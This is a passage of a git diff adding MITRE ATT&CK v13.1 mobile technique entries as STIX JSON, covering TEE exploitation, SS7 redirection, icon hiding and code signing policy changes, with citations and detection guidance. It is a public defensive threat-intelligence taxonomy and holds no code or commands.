APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884.json new file mode 100644 index 0000000000000000000000000000000000000000..91de4e9d6fe97b6a1e0aaa204a47b996a725b5c6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884.json 
@@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--7f946d28-ffa9-48e9-978c-4cfa64c85533", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884", + "created": "2017-10-25T14:48:22.716Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1405", + "url": "https://attack.mitre.org/techniques/T1405" + }, + { + "source_name": "EkbergTEE", + "url": "https://usmile.at/symposium/program/2015/ekberg", + "description": "Jan-Erik Ekberg. (2015, September 10). Android and trusted execution environments. Retrieved December 9, 2016." + }, + { + "source_name": "Thomas-TrustZone", + "url": "https://usmile.at/symposium/program/2015/thomas-holmes", + "description": "Josh Thomas and Charles Holmes. (2015, September). An infestation of dragons: Exploring vulnerabilities in the ARM TrustZone architecture. Retrieved December 9, 2016." + }, + { + "source_name": "QualcommKeyMaster", + "url": "https://bits-please.blogspot.in/2016/06/extracting-qualcomms-keymaster-keys.html", + "description": "laginimaineb. (2016, June). Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption. Retrieved December 9, 2016." + }, + { + "source_name": "laginimaineb-TEE", + "url": "http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html", + "description": "laginimaineb. (2016, May). War of the Worlds - Hijacking the Linux Kernel from QSEE. Retrieved December 21, 2016." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).", + "modified": "2022-04-06T15:41:57.666Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit TEE Vulnerability", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6.json new file mode 100644 index 0000000000000000000000000000000000000000..37450fe731dcfdaf44014f59c453c03ab5ca7f05 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6.json 
@@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--9c3bd146-03dd-4dd0-9e78-a8e3d776fb57", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:51:29.931Z", + "name": "Suppress Application Icon", + "description": "A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions. \n\nThis behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker) \n\nBeginning in Android 10, changes were introduced to inhibit malicious applications\u2019 ability to hide their icon. If an app is a system app, requests no permissions, or does not have a launcher activity, the application\u2019s icon will be fully hidden. Further, if the device is fully managed or the application is in a work profile, the icon will be fully hidden. Otherwise, a synthesized activity is shown, which is a launcher icon that represents the app\u2019s details page in the system settings. If the user clicks the synthesized activity in the launcher, they are taken to the application\u2019s details page in the system settings.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings. If the user is redirected to the device settings when tapping an application\u2019s icon, they should inspect the application to ensure it is genuine. 
Application vetting services could potentially detect the usage of APIs intended for suppressing the application\u2019s icon.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "created": "2022-03-30T20:06:22.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1628/001", + "external_id": "T1628.001" + }, + { + "source_name": "Android 10 Limitations to Hiding App Icons", + "description": "Android. (n.d.). Android 10 Release Notes: Limitations to hiding app icons. Retrieved March 30, 2022.", + "url": "https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons" + }, + { + "source_name": "LauncherApps getActivityList", + "description": "Android. (n.d.). LauncherApps: getActivityList. Retrieved March 30, 2022.", + "url": "https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist" + }, + { + "source_name": "sunny-stolen-credentials", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/" + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. 
Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/" + }, + { + "source_name": "bankbot-spybanker", + "description": "NJCCIC. (2017, March 2). BankBot/Spy Banker. Retrieved July 11, 2019.", + "url": "https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468.json new file mode 100644 index 0000000000000000000000000000000000000000..97cc3c232d4738fc3456a0d8bd964de719d1d878 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468.json 
@@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--56217f9b-b6c4-42e3-9240-88e33228e89f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468", + "created": "2017-10-25T14:48:18.583Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1399", + "url": "https://attack.mitre.org/techniques/T1399" + }, + { + "source_name": "Apple-iOSSecurityGuide", + "url": "https://www.apple.com/business/docs/iOS_Security_Guide.pdf", + "description": "Apple. (2016, May). iOS Security. Retrieved December 21, 2016." + }, + { + "source_name": "Roth-Rootkits", + "url": "https://hackinparis.com/data/slides/2013/Slidesthomasroth.pdf", + "description": "Thomas Roth. (2013). Next generation mobile rootkits. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. 
Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)", + "modified": "2022-04-06T15:48:41.647Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Modify Trusted Execution Environment", + "x_mitre_detection": "Devices may perform cryptographic integrity checks of code running within the TEE at boot time.\n\niOS devices will fail to boot if the software running within the Secure Enclave does not pass signature verification.(Citation: Apple-iOSSecurityGuide)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a.json new file mode 100644 index 0000000000000000000000000000000000000000..0b268609f2ff1302f1c243b0026a3cf27d0a50df --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a.json 
@@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--54e40de0-8b75-4a0d-b5b9-46bb9fd6df34", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a", + "type": "attack-pattern", + "created": "2017-10-25T14:48:23.652Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1459", + "external_id": "T1459" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Device Unlock Code Guessing or Brute Force", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34.json new file mode 100644 index 0000000000000000000000000000000000000000..5de3e679c07ee17254ed2dd0140f7b92d92274a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--e83f9664-b4a4-43e8-8146-0b000a8dc62c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34", + "created": "2017-10-25T14:48:21.667Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1466", + "url": "https://attack.mitre.org/techniques/T1466" + }, + { + "source_name": "NIST-SP800187", + "url": "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf", + "description": "Jeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-3" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). 
Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.", + "modified": "2022-04-06T15:50:42.480Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Downgrade to Insecure Protocols", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf.json new file mode 100644 index 0000000000000000000000000000000000000000..112be6f58ce6aba8fbb4a3a90e99dd90c4f207e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--25933274-c942-48bc-921f-631e4cbb482f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf", + "created": "2017-10-25T14:48:18.937Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1472", + "url": "https://attack.mitre.org/techniques/T1472" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.", + "modified": "2022-04-06T13:57:49.177Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Generate Fraudulent Advertising Revenue", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df.json new file mode 100644 index 0000000000000000000000000000000000000000..d59d61462aa1d8e2091b6e631f7ac6bcc8d7bc5f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df.json 
@@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--9dbf984f-8031-4dee-a3db-8c73367c39c0", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df", + "type": "attack-pattern", + "created": "2017-10-25T14:48:09.446Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1473", + "external_id": "T1473" + } + ], + "modified": "2018-10-17T01:05:10.704Z", + "name": "Malicious or Vulnerable Built-in Device Functionality", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df.json new file mode 100644 index 0000000000000000000000000000000000000000..6aae1896cc0c5cf028aa65779002cba6a0e71f45 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--e208176c-e4ce-4cc9-9005-2e1643406dab", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df", + "created": "2022-03-30T19:19:23.777Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1406.001", + "url": "https://attack.mitre.org/techniques/T1406/001" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.", + "modified": "2022-04-21T17:30:16.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Steganography", + "x_mitre_detection": "Detection of steganography is difficult unless detectable artifacts with a known signature are left behind by the obfuscation process. Look for strings are other signatures left in system artifacts related to decoding steganography.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d.json new file mode 100644 index 0000000000000000000000000000000000000000..c77b66682659285962bd580310fcfba299453f96 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d.json 
@@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--1be02b0a-6cd7-4892-8992-987f7dfc6a6d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d", + "created": "2017-10-25T14:48:06.524Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1449", + "url": "https://attack.mitre.org/techniques/T1449" + }, + { + "source_name": "3GPP-Security", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016." + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017." + }, + { + "source_name": "TheRegister-SS7", + "url": "https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/", + "description": "Iain Thomson. (2017, May 3). After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts. Retrieved November 8, 2018." + }, + { + "source_name": "Positive-SS7", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016." + }, + { + "source_name": "Engel-SS7-2008", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016." 
+ }, + { + "source_name": "Engel-SS7", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-37" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).", + "modified": "2022-04-06T15:53:27.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit SS7 to Redirect Phone Calls/SMS", + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation as described by the Communications, Security, Reliability, and Interoperability Council (CSRIC). (Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f.json new file mode 100644 index 0000000000000000000000000000000000000000..fa9723a2d1e3a5e34f013f0629b071ac7b2aa853 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--1c25481c-0e7c-41af-a03a-97e1b75b7ba0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:59:57.485Z", + "name": "Hide Artifacts", + "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Mobile operating systems have features and developer APIs to hide various artifacts, such as an application\u2019s launcher icon. These APIs have legitimate usages, such as hiding an icon to avoid application drawer clutter when an application does not have a usable interface. Adversaries may abuse these features and APIs to hide artifacts from the user to evade detection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can examine the list of all installed applications in the device settings. Application vetting services could potentially detect the usage of APIs intended for artifact hiding.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "created": "2022-03-30T20:00:12.654Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1628", + "external_id": "T1628" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0.json new file mode 100644 index 0000000000000000000000000000000000000000..5a100fa44f10b40dc39dd5cc1271baaf724f95fa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--433b4d09-a250-4603-b36e-804281a9f1d7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:37:55.822Z", + "name": "Code Signing Policy Modification", + "description": "Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device. \n\nMobile devices generally enable these security controls by default, such as preventing the installation of unknown applications on Android. Adversaries may modify these policies in a number of ways, including [Input Injection](https://attack.mitre.org/techniques/T1516) or malicious configuration profiles.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.\n\nOn iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. 
A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "created": "2022-03-30T18:13:26.003Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1632/001", + "external_id": "T1632.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html", + "external_id": "STA-7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd211238-f767-4599-8c0d-9dca36624626.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd211238-f767-4599-8c0d-9dca36624626.json new file mode 100644 index 0000000000000000000000000000000000000000..b37ea416a71027c6377cbc6f688e191bc56478c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd211238-f767-4599-8c0d-9dca36624626.json 
